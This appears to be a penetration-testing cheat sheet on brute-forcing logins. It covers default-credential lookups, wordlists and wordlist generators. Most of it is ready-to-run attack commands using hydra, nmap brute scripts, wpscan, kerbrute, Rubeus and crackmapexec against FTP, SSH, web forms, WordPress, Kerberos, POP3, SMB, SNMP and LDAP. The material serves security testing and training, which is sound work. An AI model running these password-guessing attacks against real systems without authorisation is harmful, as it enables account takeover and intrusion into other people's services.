Brute Forcing

Introduction
One way to gain access to a company's website, service, infrastructure, computers... can be achieved using default credentials or weak credentials. For example, the administrator password for the company's firewall could be "spring2022".
Default credentials
Many web applications, services, and devices have a default administrator account with a default password. However, the password might not have been changed after the device was set up. This is an opportunity for the attacker to obtain the default credentials for the technology to gain access.
Try to identify the software, find whether it uses default passwords and if so, what they are:
Search for "<SOFTWARE> default password".
Try the same user as the password.
Review the documentation.
Review the source code, if available.
Check for default credentials databases:
​Cirt - Default passwords​
​SectLists - Default Credentials​
​Passwords Database​
​Data Recovery - Default Passwords​
​DefaultCreds Cheat Sheet​
Dictionaries
In case the default credentials for the target did not work, an attacker could use already existing dictionaries with default passwords or craft a dictionary based on the password policies of the targeted company.
Existing dictionaries
There are already built dictionaries with thousands of passwords.
​Kaonashi​
​Rockyou​
​SecList - Passwords​
Crafting dictionaries
Based on the information of the target we can craft personalized dictionaries. Moreover, there are tools that can facilitate the attacker the work.
Cewl: Crawls the website you provided for commonly-used keywords and collects them into a list for you.
cewl <URL> --with-numbers -n -m 5 -d 3 -w output.txt
Crunch: you can specify a character set, and it will generate a huge number of permutations using the characters you specify.
# Generate a combination with a set of alphanumeric characters
crunch 5 8 abcdefghijlkmnñopqrstuvwxyzABCDEFGHIJLKMNÑOPQRSTUVWXYZ0123456789
Cupp: Generates passwords based on provided keywords about the target.
cupp -i
Attacks
This subsection contains commands to perform brute force attacks on different technologies.
FTP
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT>] | -p <PASSWORD>} ftp://<TARGET>
SSH
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ssh://<TARGET>
nmap -n -p 22 --script ssh-brute <TARGET>
nmap -n -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'<USER1>', '<USER2>'}, ssh.privatekeys={'<PRIVATE_KEY_1>', '<PRIVATE_KEY_2>'}"  <TARGET>
Web
An attacker could encounter different login portals during a web analysis that can be brute-forced.
Basic Authentication
hydra -I {-l <username> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.txt>} -f <IP> -s <PORT> http-get <URL>
Post Authentication
hydra {-l <username> | -L <USERS.TXT>}  {-p <PASSWORD> | -P <WORDLIST.txt>} <TARGET> -V http-form-post '<ENDPOINT>:<usernam=^USER^&pwd=^PASS^>:<WRONG CREDENTIALS M'
Note: Nowadays, hydra does not support forms with CRFS tokens. Thus, a solution would be to use Burp Suite.
WordPress
wpscan --url <WORDPRESS_URL> –-passwords <WORDLIST.TXT> -–usernames <USERS.TXT> -–max-threads <NUMBER_THREADS>
Kerberos
There are several ways to perform a brute-force attack against a Kerberos service.
# with a list of users
python kerbrute.py -domain <DOMAIN> -users <USERS.TXT> -passwords <WORDLIST.TXT> -outputfile <OUTPUT.TXT>
.\Rubeus.exe brute /users: <USERS.TXT> /passwords:<WORDLIST.TXT> /domain:<DOMAIN> /outfile:<OUTPUT.TXT>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<WORDLIST.TXT> /outfile:<OUTPUT.TXT>
POP3
nmap -n -p110 --script pop3-brute <TARGET>
hydra  {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f <TARGET> pop3 -V
SMB
First of all, check the passwords policy to avoid banning accounts.
crackmapexec smb <IP> --pas-pol
Then, you can brute-forcing with the following tools.
crackmapexec smb <TARGET> -u {<USERS.TXT>|<USER>} -p {<WORDLIST.TXT>|<PASSWORD>} [--continue-on-success]
hydra {-L <USER.TXT> | -l <USERNAME>} {-P <WORDLIST.TXT> | -p <PASSWORD>} smb://<TARGET>
SNMP
You can brute force SNMP community strings with hydra.
hydra -P /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt <TARGET> snmp
LDAP
Attempts to brute-force LDAP authentication. By default, it uses the built-in username and password lists. In order to use your own lists use the userdb and passdb script arguments.
nmap --script ldap-brute -p 389 <IP>
Another option is to use hydra.
hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ldap2://<TARGET>
References
​Authentication Testing​
​Brute Force - CheatSheet​
2 - Exploitation
WEB
Last modified 8mo ago